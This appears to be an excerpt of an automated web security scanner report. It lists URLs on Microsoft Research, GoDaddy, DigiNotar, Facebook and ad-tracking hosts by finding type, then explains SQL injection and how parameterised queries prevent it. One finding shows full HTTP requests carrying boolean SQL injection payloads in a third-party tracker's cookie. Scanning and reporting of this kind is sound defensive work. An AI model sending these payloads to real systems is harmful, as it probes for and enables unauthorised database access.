22.114. http://research.microsoft.com/en-us/people/alecw/

22.115. http://research.microsoft.com/en-us/people/alexac/default.aspx

22.116. http://research.microsoft.com/en-us/people/aphillip/

22.117. http://research.microsoft.com/en-us/people/aproutie/

22.118. http://research.microsoft.com/en-us/people/aratan/default.aspx

22.119. http://research.microsoft.com/en-us/people/asellen/

22.120. http://research.microsoft.com/en-us/people/asellen/default.aspx

22.121. http://research.microsoft.com/en-us/people/bainguo/default.aspx

22.122. http://research.microsoft.com/en-us/people/bibuxton/default.aspx

22.123. http://research.microsoft.com/en-us/people/birrell/default.aspx

22.124. http://research.microsoft.com/en-us/people/blinn/default.aspx

22.125. http://research.microsoft.com/en-us/people/bycook/default.aspx

22.126. http://research.microsoft.com/en-us/people/cthacker/default.aspx

22.127. http://research.microsoft.com/en-us/people/dburger/

22.128. http://research.microsoft.com/en-us/people/dburger/default.aspx

22.129. http://research.microsoft.com/en-us/people/deng/default.aspx

22.130. http://research.microsoft.com/en-us/people/dmb/

22.131. http://research.microsoft.com/en-us/people/dmb/default.aspx

22.132. http://research.microsoft.com/en-us/people/dwork/

22.133. http://research.microsoft.com/en-us/people/gbell/default.aspx

22.134. http://research.microsoft.com/en-us/people/ggr/default.aspx

22.135. http://research.microsoft.com/en-us/people/goldberg/default.aspx

22.136. http://research.microsoft.com/en-us/people/grama/default.aspx

22.137. http://research.microsoft.com/en-us/people/gray/

22.138. http://research.microsoft.com/en-us/people/gray/default.aspx

22.139. http://research.microsoft.com/en-us/people/hon/default.aspx

22.140. http://research.microsoft.com/en-us/people/horvitz/default.aspx

22.141. http://research.microsoft.com/en-us/people/hsalama/default.aspx

22.142. http://research.microsoft.com/en-us/people/hshum/default.aspx

22.143. http://research.microsoft.com/en-us/people/indranim/

22.144. http://research.microsoft.com/en-us/people/jamiesho/

22.145. http://research.microsoft.com/en-us/people/jbishop/default.aspx

22.146. http://research.microsoft.com/en-us/people/jiansun/default.aspx

22.147. http://research.microsoft.com/en-us/people/johndo/default.aspx

22.148. http://research.microsoft.com/en-us/people/jplatt/default.aspx

22.149. http://research.microsoft.com/en-us/people/jtw/default.aspx

22.150. http://research.microsoft.com/en-us/people/krw/default.aspx

22.151. http://research.microsoft.com/en-us/people/kstrauss/

22.152. http://research.microsoft.com/en-us/people/larus/default.aspx

22.153. http://research.microsoft.com/en-us/people/lilich/

22.154. http://research.microsoft.com/en-us/people/lilich/default.aspx

22.155. http://research.microsoft.com/en-us/people/lintaoz/default.aspx

22.156. http://research.microsoft.com/en-us/people/liuj/default.aspx

22.157. http://research.microsoft.com/en-us/people/lomet/default.aspx

22.158. http://research.microsoft.com/en-us/people/luca/default.aspx

22.159. http://research.microsoft.com/en-us/people/malvar/

22.160. http://research.microsoft.com/en-us/people/malvar/default.aspx

22.161. http://research.microsoft.com/en-us/people/manuelc/default.aspx

22.162. http://research.microsoft.com/en-us/people/marycz/default.aspx

22.163. http://research.microsoft.com/en-us/people/mds/

22.164. http://research.microsoft.com/en-us/people/mds/default.aspx

22.165. http://research.microsoft.com/en-us/people/milanv/

22.166. http://research.microsoft.com/en-us/people/milanv/default.aspx

22.167. http://research.microsoft.com/en-us/people/mzh/

22.168. http://research.microsoft.com/en-us/people/najork/default.aspx

22.169. http://research.microsoft.com/en-us/people/pachou/default.aspx

22.170. http://research.microsoft.com/en-us/people/padmanab/default.aspx

22.171. http://research.microsoft.com/en-us/people/palarson/default.aspx

22.172. http://research.microsoft.com/en-us/people/parno/

22.173. http://research.microsoft.com/en-us/people/philbe/

22.174. http://research.microsoft.com/en-us/people/philbe/default.aspx

22.175. http://research.microsoft.com/en-us/people/ramjee/

22.176. http://research.microsoft.com/en-us/people/ranveer/default.aspx

22.177. http://research.microsoft.com/en-us/people/rashid/default.aspx

22.178. http://research.microsoft.com/en-us/people/richdr/default.aspx

22.179. http://research.microsoft.com/en-us/people/robertson/default.aspx

22.180. http://research.microsoft.com/en-us/people/roylevin/

22.181. http://research.microsoft.com/en-us/people/sdumais/default.aspx

22.182. http://research.microsoft.com/en-us/people/shuvendu/default.aspx

22.183. http://research.microsoft.com/en-us/people/simonpj/

22.184. http://research.microsoft.com/en-us/people/simonpj/default.aspx

22.185. http://research.microsoft.com/en-us/people/spli/

22.186. http://research.microsoft.com/en-us/people/surajitc/

22.187. http://research.microsoft.com/en-us/people/surajitc/default.aspx

22.188. http://research.microsoft.com/en-us/people/terry/default.aspx

22.189. http://research.microsoft.com/en-us/people/thekkath/default.aspx

22.190. http://research.microsoft.com/en-us/people/thoare/

22.191. http://research.microsoft.com/en-us/people/thoare/default.aspx

22.192. http://research.microsoft.com/en-us/people/tonyhey/default.aspx

22.193. http://research.microsoft.com/en-us/people/tsharp/

22.194. http://research.microsoft.com/en-us/people/wenwuzhu/default.aspx

22.195. http://research.microsoft.com/en-us/people/wobber/default.aspx

22.196. http://research.microsoft.com/en-us/people/wong/default.aspx

22.197. http://research.microsoft.com/en-us/people/wyma/

22.198. http://research.microsoft.com/en-us/people/zhao/default.aspx

22.199. http://research.microsoft.com/en-us/press/ablake.aspx

22.200. http://research.microsoft.com/en-us/press/anandan.aspx

22.201. http://research.microsoft.com/en-us/press/bainguo.aspx

22.202. http://research.microsoft.com/en-us/press/borgs.aspx

22.203. http://research.microsoft.com/en-us/press/cmbishop.aspx

22.204. http://research.microsoft.com/en-us/press/default.aspx

22.205. http://research.microsoft.com/en-us/press/fastfacts.aspx

22.206. http://research.microsoft.com/en-us/press/hon.aspx

22.207. http://research.microsoft.com/en-us/press/jchayes.aspx

22.208. http://research.microsoft.com/en-us/press/kevinsch.aspx

22.209. http://research.microsoft.com/en-us/press/kwood.aspx

22.210. http://research.microsoft.com/en-us/press/malvar.aspx

22.211. http://research.microsoft.com/en-us/press/mds.aspx

22.212. http://research.microsoft.com/en-us/press/overview.aspx

22.213. http://research.microsoft.com/en-us/press/rajamani.aspx

22.214. http://research.microsoft.com/en-us/press/roylevin.aspx

22.215. http://research.microsoft.com/en-us/press/telabbady.aspx

22.216. http://research.microsoft.com/en-us/projects/chem4word/default.aspx

22.217. http://research.microsoft.com/en-us/projects/creativecommons/default.aspx

22.218. http://research.microsoft.com/en-us/projects/csec/

22.219. http://research.microsoft.com/en-us/projects/nodexl/

22.220. http://research.microsoft.com/en-us/projects/researchgames/

22.221. http://research.microsoft.com/en-us/projects/serviceos/

22.222. http://research.microsoft.com/en-us/projects/wwt/contest.aspx

22.223. http://research.microsoft.com/en-us/projects/wwt/default.aspx

22.224. http://research.microsoft.com/en-us/research/default.aspx

22.225. http://research.microsoft.com/en-us/um/people/awf/

22.226. http://research.microsoft.com/en-us/um/people/bahl/

22.227. http://research.microsoft.com/en-us/um/people/borgs/

22.228. http://research.microsoft.com/en-us/um/people/jchayes/

22.229. http://research.microsoft.com/en-us/um/people/szeliski/

22.230. http://research.microsoft.com/en-us/um/redmond/about/timeline/

22.231. http://research.microsoft.com/feedGen/

22.232. http://research.microsoft.com/nothing.html

22.233. http://static.ak.facebook.com/connect/canvas_proxy.php

22.234. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/FGFbc80dUKj.png

22.235. http://www.facebook.com/connect/uiserver.php

22.236. http://www.facebook.com/extern/login_status.php

22.237. http://www.facebook.com/extern/login_status.php

22.238. http://www.facebook.com/extern/login_status.php

22.239. http://www.facebook.com/extern/login_status.php

22.240. http://www.facebook.com/extern/login_status.php

22.241. http://www.facebook.com/extern/login_status.php

22.242. http://www.facebook.com/plugins/like.php

22.243. http://www.facebook.com/plugins/like.php

22.244. http://www.facebook.com/plugins/like.php

22.245. http://www.facebook.com/plugins/like.php

22.246. http://www.facebook.com/plugins/like.php

22.247. http://www.facebook.com/plugins/like.php

22.248. http://www.facebook.com/plugins/like.php

22.249. http://www.facebook.com/plugins/like.php

22.250. http://www.facebook.com/plugins/like.php

22.251. http://www.facebook.com/plugins/like.php

22.252. http://www.facebook.com/plugins/like.php

22.253. http://www.facebook.com/plugins/like.php

22.254. http://www.facebook.com/plugins/like.php

22.255. http://www.facebook.com/plugins/like.php

22.256. http://www.register.com/

22.257. http://www.register.com/domain/searchresults.rcmx

22.258. http://www.register.com/unauthenticated_session_expired.rcmx

22.259. http://www.register.com/unauthenticated_session_expired.rcmx

23. Credit card numbers disclosed

23.1. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/bek_tr.pdf

23.2. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/dagstuhl-summary-09141.pdf

23.3. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/hotsec06.pdf

23.4. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/pepm08.pdf

23.5. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/transducers_tr.pdf

23.6. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/usenixsec11a.pdf

23.7. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/w2sp07.pdf

23.8. http://research.microsoft.com/en-us/um/people/livshits/papers/pdf/w2sp10.pdf

23.9. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pdf

23.10. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/usenixtech08.pdf

23.11. http://research.microsoft.com/en-us/um/people/livshits/papers/tr/scriptgard_tr.pdf

23.12. http://research.microsoft.com/en-us/um/people/nswamy/papers/beep-www07.pdf

23.13. http://research.microsoft.com/en-us/um/people/nswamy/papers/rs.pdf

23.14. http://research.microsoft.com/en-us/um/people/shuochen/papers/ScriptAccenting.pdf

23.15. http://research.microsoft.com/en-us/um/people/xiaohe/publication/IEEE_MMSP06_p226.pdf

23.16. http://research.microsoft.com/en-us/um/people/zhang/

23.17. http://research.microsoft.com/en-us/um/redmond/events/aplwaca2010/s0pknu7ytck3k3lq9nas/p45-krithinakis.pdf

23.18. http://www.meetup.com/Boston-BizSpark-Meetup/

24. Robots.txt file

24.1. http://825-wpk-761.mktoresp.com/webevents/visitWebPage

24.2. http://ads.bluelithium.com/pixel

24.3. http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js

24.4. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

24.5. http://c.mouseflow.com/a.gif

24.6. http://c7.zedo.com/img/bh.gif

24.7. https://cart.godaddy.com/basket.aspx

24.8. http://cspix.media6degrees.com/orbserv/hbpix

24.9. http://d3.zedo.com/jsc/d3/bh.html

24.10. http://d7.zedo.com/img/bh.gif

24.11. http://dclk-match.dotomi.com/

24.12. http://fonts.googleapis.com/css

24.13. https://idp.godaddy.com/login.aspx

24.14. http://imagesak.securepaynet.net/assets/godaddy.ico

24.15. http://img.godaddy.com/image.aspx

24.16. http://img1.wsimg.com/assets/godaddy.ico

24.17. http://img3.wsimg.com/fastball/js_lib/FastballLibrary0006.js

24.18. http://login.dotomi.com/ucm/UCMController

24.19. https://mya.godaddy.com/products/accountlist.aspx

24.20. http://pagead2.googlesyndication.com/pagead/imgad

24.21. http://pixel.adblade.com/imps.php

24.22. http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard

24.23. http://rss2search.com/delivery/ti.php

24.24. http://s.gravatar.com/js/gprofiles.js

24.25. http://segment-pixel.invitemedia.com/set_partner_uid

24.26. http://themes.googleusercontent.com/static/fonts/droidsans/v1/EFpQQyG9GqCrobXxL-KRMQFhaRv2pGgT5Kf0An0s4MM.woff

24.27. http://value.register.com/b/ss/registerwww-production/1/H.20.3/s74702994271647

24.28. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html

24.29. https://www.cheapssls.com/index.php

24.30. http://www.digicert.com/

24.31. http://www.godaddy.com/SSL

24.32. https://www.godaddy.com/gdshop/xt_orderform_addmany.asp

24.33. http://www.googleadservices.com/pagead/conversion/1051291126/

24.34. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/

24.35. http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760

24.36. https://www.microcad.ca/checkout/address

24.37. http://www.shrinktheweb.com/scripts/pagepix.js

24.38. https://www.sslmatrix.com/ssl-promotion-code

24.39. http://www.wunderground.com/dotset.php

24.40. http://www.youtube-nocookie.com/gen_204

25. Cacheable HTTPS response

25.1. https://careers.microsoft.com/Resumes.aspx

25.2. https://idp.godaddy.com/login.aspx

25.3. https://idp.godaddy.com/retrieveaccount.aspx

25.4. https://onlineaanvraag.diginotar.nl/Digiforms/FormDesigner.aspx

25.5. https://support.microsoft.com/contactus/emailcontact.aspx

25.6. https://www.diginotar.com/Branchsolutions/tabid/857/Default.aspx

25.7. https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx

25.8. https://www.microsoft-careers.com/

25.9. https://www.microsoft-careers.com/content/corporate-research/

25.10. https://www.microsoft-careers.com/find.job

25.11. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/

25.12. https://www.microsoft-careers.com/job/Redmond-Senior-Software-Development-Engineer-Job-WA-98052/1436711/

25.13. https://www.sslmatrix.com/Order/quickorder

25.14. https://www.sslmatrix.com/ssl-promotion-code

25.15. https://www.sslmatrix.com/ssl-promotion-code/ssl-price

26. HTML does not specify charset

26.1. http://d3.zedo.com/jsc/d3/bh.html

26.2. http://ds.addthis.com/red/psi/sites/vasco.com/p.json

26.3. http://mediacdn.disqus.com/1314991730/build/system/def.html

26.4. http://mediacdn.disqus.com/1314991730/build/system/reply.html

26.5. http://mediacdn.disqus.com/1314991730/build/system/upload.html

26.6. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.7. https://onlineaanvraag.diginotar.nl/

26.8. http://research.microsoft.com/apps/dp/h.htm

26.9. http://research.microsoft.com/en-us/um/people/chengh/measure.html

26.10. http://research.microsoft.com/en-us/um/people/chengh/measurev2.html

26.11. http://research.microsoft.com/en-us/um/people/darkok/

26.12. http://research.microsoft.com/en-us/um/people/dbwilson/

26.13. http://research.microsoft.com/en-us/um/people/horvitz/

26.14. http://research.microsoft.com/en-us/um/people/lamport/

26.15. http://research.microsoft.com/en-us/um/people/livshits/papers/abstracts/usenixsec11b.abstract.html

26.16. http://research.microsoft.com/en-us/um/people/ratul/

26.17. http://research.microsoft.com/en-us/um/people/schramm/memorial/

26.18. http://research.microsoft.com/en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/list.html

26.19. http://research.microsoft.com/en-us/um/people/simonpj/haskell98-revised/haskell98-report-html/standard-prelude.html

26.20. http://research.microsoft.com/en-us/um/people/ssaponas/

26.21. http://research.microsoft.com/en-us/um/people/yongrui/

26.22. http://research.microsoft.com/en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/VMNetsrv.msi.htm

26.23. http://research.microsoft.com/en-us/um/redmond/projects/invisible/src/drivers/net/packet/lib/i386/obsolete/VMNetSrv.msi.htm

26.24. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

26.25. http://www.godaddy.com/sso/keepalive.aspx

26.26. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php

26.27. https://www.sslmatrix.com/favicon.ico

27. Content type incorrectly stated

27.1. http://api.twitter.com/1/urls/resolve.json

27.2. http://api.twitter.com/1/users/search.json

27.3. http://api.twitter.com/i/search/image_facets.json

27.4. http://api.twitter.com/i/search/video_facets.json

27.5. http://diginotar.nl/Default.aspx

27.6. http://farm6.static.flickr.com/clientaccesspolicy.xml

27.7. http://farm6.static.flickr.com/crossdomain.xml

27.8. http://farm7.static.flickr.com/clientaccesspolicy.xml

27.9. http://feeds.feedburner.com/~s/meetup

27.10. http://img1.meetupstatic.com/39194172310009655/img/noPhoto_50.gif

27.11. http://img1.meetupstatic.com/photos/event/2/c/b/b/highres_36191451.jpeg

27.12. http://img1.meetupstatic.com/photos/event/6/e/b/highres_45241771.jpeg

27.13. http://img1.meetupstatic.com/photos/event/9/9/8/5/highres_32139301.jpeg

27.14. http://img2.meetupstatic.com/photos/event/9/c/2/3/highres_39819971.jpeg

27.15. http://img2.meetupstatic.com/photos/event/a/5/e/7/highres_43722471.jpeg

27.16. http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png

27.17. http://microsoftcambridge.com/favicon.ico

27.18. http://microsoftcambridge.com/slideshow/Vertigo.small.xap

27.19. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.20. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard

27.21. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Annuleren.png

27.22. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Volgende.png

27.23. https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Vorige.png

27.24. http://photos1.meetupstatic.com/photos/event/2/8/a/0/thumb_22990400.jpeg

27.25. http://photos1.meetupstatic.com/photos/event/a/0/9/5/highres_9821109.jpeg

27.26. http://photos1.meetupstatic.com/photos/member/3/2/3/0/thumb_11052848.jpeg

27.27. http://photos2.meetupstatic.com/photos/event/9/1/d/e/thumb_10177342.jpeg

27.28. http://photos2.meetupstatic.com/photos/event/a/1/9/a/highres_9821370.jpeg

27.29. http://photos2.meetupstatic.com/photos/member/7/6/d/8/thumb_1590424.jpeg

27.30. http://photos2.meetupstatic.com/photos/member/a/e/2/9/thumb_9884585.jpeg

27.31. http://photos3.meetupstatic.com/photos/event/a/0/9/4/highres_9821108.jpeg

27.32. http://photos3.meetupstatic.com/photos/member/1/3/0/f/thumb_11344879.jpeg

27.33. http://photos3.meetupstatic.com/photos/member/1/d/6/1/thumb_18127521.jpeg

27.34. http://photos3.meetupstatic.com/photos/member/7/e/a/1/thumb_12752417.jpeg

27.35. http://photos4.meetupstatic.com/photos/event/a/0/9/6/highres_9821110.jpeg

27.36. http://photos4.meetupstatic.com/photos/member/2/7/2/f/thumb_20650031.jpeg

27.37. http://research.microsoft.com/en-us/um/people/helenw/papers/fullMashupOS.pptx

27.38. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pptx

27.39. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/w2sp10.pptx

27.40. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

27.41. http://search.twitter.com/search.json

27.42. http://survey.112.2o7.net/survey/dynamic/suites/276/omniturecom-2011/list.js

27.43. http://twitter.com/account/available_features

27.44. http://vasco.com/app_pages/getDCP.aspx

27.45. http://www.godaddy.com/sso/keepalive.aspx

27.46. http://www.google.com/search

27.47. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php

27.48. http://www.meetup.com/api/

27.49. http://www.microcad.ca/livezilla/images/carrier_logo.gif

27.50. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc

27.51. http://www.microsoft-careers.com/model/remote/remotejobManager.cfc

27.52. http://www.omniture.com/listener.html

27.53. http://www.register.com/font/vag-bold.ttf

27.54. http://www.register.com/font/vag-bold.woff

28. Content type is not specified

28.1. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard

28.2. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard

29. SSL certificate

29.1. https://cart.godaddy.com/

29.2. https://idp.godaddy.com/

29.3. https://mya.godaddy.com/

29.4. https://www.cheapssls.com/

29.5. https://www.godaddy.com/

29.6. https://www.microcad.ca/

29.7. https://www.sslmatrix.com/



1. SQL injection  next
There are 20 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://cspix.media6degrees.com/orbserv/hbpix [acs cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The acs cookie appears to be vulnerable to SQL injection attacks. The payloads 18652187'%20or%201%3d1--%20 and 18652187'%20or%201%3d2--%20 were each submitted in the acs cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt1018652187'%20or%201%3d1--%20; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: vstcnt=41bb010r063d7x118e10124zbs2150v10024fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: clid=2lqyje70117095fjndb6bb2p0000h02q6u2q102q92q; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: sglst=41bb00v00t044m9w00arr9w00dnh9u30arp9u303td9w00f7u9u307219w00a6p9w000kn9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:48 GMT; Path=/
Set-Cookie: rdrlst=41l0sh6lqyjef0000001h6u1h0m79lqyjec0000001z6u1z0xv3lqyjec0000001y6u1y0m7dlqyjee0000001o6u1o16pilqyjea000000286u280x18lqyjee0000001p6u1p18ldlqyjeb000000276u270moulqyjee0000001n6u1n0moqlqyjeb000000226u2218etlqyjea000000286u280dhxlqyjea000000286u2818lqlqyjea000000296u291196lqyjea0000002c6u2c14khlqyjea000000286u2814hnlqyjea000000286u281195lqyjea0000002d6u2d1194lqyje90000002e6u2e00c1lqyjee0000001p6u1p1axvlqyjee0000001l6u1l1193lqyje90000002f6u2f1192lqyje70000002l6u2l10tylqyje90000002g6u2g0cablqyjee0000001p6u1p06pblqyjee0000001p6u1p07sylqyjee0000001p6u1p18w4lqyjef0000001k6u1k10telqyje80000002h6u2h16d5lqyjee0000001p6u1p159elqyjee0000001m6u1m10rdlqyje80000002i6u2i0m3zlqyjec000000206u200miwlqyjec000000216u211ad8lqyje80000002j6u2j18k9lqyjeb000000266u260m0slqyjee0000001q6u1q0m43lqyjed0000001r6u1r0m0olqyjeb000000236u231679lqyjed0000001s6u1s12qnlqyje70000002k6u2k0mjdlqyjeb000000246u240mjhlqyjed0000001t6u1t1671lqyjeb000000256u250lw4lqyjea000000286u280lm1lqyjed0000001u6u1u0rzglqyjef0000001i6u1i18kzlqyjea0000002a6u2a17gxlqyjea000000286u280lm5lqyjed0000001v6u1v0lltlqyjec0000001w6u1w0zpelqyjea000000286u280llxlqyjec0000001x6u1x18knlqyjea0000002b6u2b18hblqyjef0000001j6u1j0afolqyjee0000001p6u1p0kkjlqyjee0000001p6u1p14b
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4e5e3f1ae3fd7427&curl=http%3a%2f%2fvasco.com%2fcompany%2fpress_room%2fnews_archive%2f2011%2fnews_diginotar_reports_security_incident.aspx HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lqt1dm0zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=016020a0e0f0g0h1lqt1dmxzt137enxzt137enxzt10xzt137enxzt1018652187'%20or%201%3d2--%20; orblb=2lqupib012fd10u0100000; vstcnt=41bb010r053d7x118e10124zbs2150v10024fj9y118e10024t1es127p1012455ue118e1022; clid=2lqt1dm01170vf1kj11kp2en03m9g00b6t05100b906; sglst=41bb00v00t044m9v00arr9v00dnh9u303td9v00arp9u30f7u9u307219v000kn9v00a6p9v005m39v005m29u305no9u30dsb9v00cnw9v00esh9v00cnu9u30gol9u30esg9u30ctn9u308nc9v00ebb9v00ctp9v00cro9v004qk9u30h9v9u30dzq9u30bow9u304wb9v00dzt9v000xz0108dy9v0; rdrlst=41a0sh6lqupib000000066t051d6blqupib000000066t051byalqtqj1000000096t05120zlqupib000000066t0513kulqupib000000066t0516pilqwj0f000000026t020x18lqupib000000066t0518k8lqupib000000066t0516pelqtqj1000000096t0518ldlqwnn2000000016t0118lclqupib000000066t0518erlqtqj1000000096t05163mlqupib000000066t0518etlqwj0f000000026t0209pglqupib000000066t051679lqupib000000066t050dhvlqupib000000066t050dhxlqwj0f000000026t0218lplqupib000000066t0514kelqtqj1000000096t0518lqlqwj06000000036t0314khlqwj0f000000026t0214hnlqwj0f000000026t020lw4lqwj0f000000026t0218l0lqtqsb000000076t050lm0lqupib000000066t0517fllqupib000000066t0517gxlqtqj1000000096t0518kzlqwj02000000046t040lm4lqupib000000066t050llslqupib000000066t050zpelqwj0f000000026t020zpclqtqj1000000096t0519ezlqtqj1000000096t0518knlqw8s9000000056t0506pblqupib000000066t0518kmlqtqjn000000086t050afolqupib000000066t0507sylqupib000000066t050kkjlqupib000000066t050drhlqupib000000066t0514bxlqwj0f000000026t0214bulqtqj1000000096t051cyqlqtqj1000000096t050huxlqtqj1000000096t0516d5lqwj0f000000026t02

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lqupib012fd10u0100000; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
Set-Cookie: vstcnt=41bb010r064zbs2150v10023d7x118e10124fj9y118e10024t1es127p10124uzg6118e1032455ue118e1022; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
Set-Cookie: clid=2lqyje70117095fjndb6bb2p0000i02r6u2r102r92r; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
